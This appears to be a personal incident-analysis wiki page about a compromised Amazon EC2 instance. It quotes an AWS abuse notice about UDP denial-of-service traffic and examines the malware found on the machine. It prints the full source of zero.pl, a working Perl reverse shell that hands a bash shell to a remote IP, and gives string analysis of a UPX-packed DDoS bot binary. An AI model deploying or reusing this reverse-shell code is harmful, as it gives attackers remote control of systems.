Virus/zero.pl
< Virus
From: Amazon EC2 Abuse Subject: Your Amazon EC2 Abuse Report [16614771493-2] Date: July 7, 2014 at 6:41:49 AM MST Reply-To: Amazon EC2 Abuse <ec2-abuse@amazon.com> Dear Amazon EC2 Customer, We've received a report that your instance(s): Instance Id: i-XXXXXXXX has been making Denial of Service attacks against remote hosts on the Internet. Check the information provided below by the abuse reporter. This is specifically forbidden in our User Agreement: http://aws.amazon.com/agreement/ Please immediately restrict the flow of traffic from your instances(s) to cease disruption to other networks and reply this email to send your reply of action to the original abuse reporter. This will activate a flag in our ticketing system, letting us know that you have acknowledged receipt of this email. It's possible that your environment has been compromised by an external attacker. It remains your responsibility to ensure that your instances and all applications are secured. The link http://developer.amazonwebservices.com/connect/entry.jspa?externalID=1233 provides some suggestions for securing your instances. It has come to our attention that Denial of Service (DoS) attacks were launched from your instance to IP XXX.XXX.XXX.XXX via UDP port(s) 80. Please investigate your instance(s) and reply detailing the corrective measures you will be taking to address this activity. Case number: 16614771493-1 Additional abuse report information provided by original abuse reporter: * Destination IPs: * Destination Ports: * Destination URLs: * Abuse Time: Mon Jul 07 13:25:43 UTC 2014 * Log Extract: <<< It has come to our attention that Denial of Service (DoS) attacks were launched from your instance to IP 116.31.100.90 via UDP port(s) 80. Please investigate your instance(s) and reply detailing the corrective measures you will be taking to address this activity. In the meantime, we have blocked outbound UDP 80 on the instance(s) to prevent further abuse. If you believe that you were compromised by an external attacker, the best recourse is to back up your data, migrate your applications to a new instance, and terminate the old one. Attempting to repair a compromised instance does not guarantee a successful cleanup in most cases. We recommend reviewing the following resources to ensure your EC2 environment is properly secured: * Amazon EC2 Security Groups User Guide: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html * AWS Security Resources: http://aws.amazon.com/security/security-resources/ * AWS Security Best Practices: https://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf Thanks in advance for your attention to this report.
Files found:
c3fd28831d9fc683000273643b5bef12 zero.pl 4206e8b780cf3758baa76b1002e61792 .Linux_time_y_2015
Guessing they somehow came through a security exploit in ElasticSearch.
zero.pl: (also found here: [1])
#!/usr/bin/perl -w use strict; use Socket; use IO::Handle; if($#ARGV+1 != 2){ print "$#ARGV $0 Remote_IP Remote_Port \n"; exit 1; } my $remote_ip = $ARGV[0]; my $remote_port = $ARGV[1]; my $proto = getprotobyname("tcp"); my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip)); my $shell = '/bin/bash -i'; socket(SOCK, AF_INET, SOCK_STREAM, $proto); STDOUT->autoflush(1); SOCK->autoflush(1); connect(SOCK,$pack_addr) or die "can not connect:$!"; open STDIN, "<&SOCK"; open STDOUT, ">&SOCK"; open STDERR, ">&SOCK"; print "Enjoy the shell.\n"; system($shell); close SOCK; exit 0;
.Linux_time_y_2015: (binary)
- statically linked executable
- file: linux: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
- strings:
- "This file is packed with the UPX executable packer http://upx.sf.net"
- upx decompressed strings:
- "std::basic_string" -- implies it was a C++ source file
- "Keld Simonsen" -- fluke? compiler?
- "keld@dkuug.dk"
- "+45 3122-6543"
- "+45 3325-6543"
- "1997-12-20"
- "ISO/IEC JTC1/SC22/WG20 - internationalization"
- "C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V"
- "GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)" -- compiler
- Source files mentioned: (possibly related: [2])
- Fake.cpp
- Global.cpp
- main.cpp
- Manager.cpp
- ServerIP.cpp
- StatBase.cpp
- ThreadAttack.cpp
- ThreadHostStatus.cpp
- ThreadTaskManager.cpp
- ThreadTimer.cpp
- AutoLock.cpp
- FileOp.cpp
- Log.cpp
- Md5.cpp
- Media.cpp
- NetBase.cpp
- ThreadCondition.cpp
- Thread.cpp
- ThreadMutex.cpp
- Utility.cpp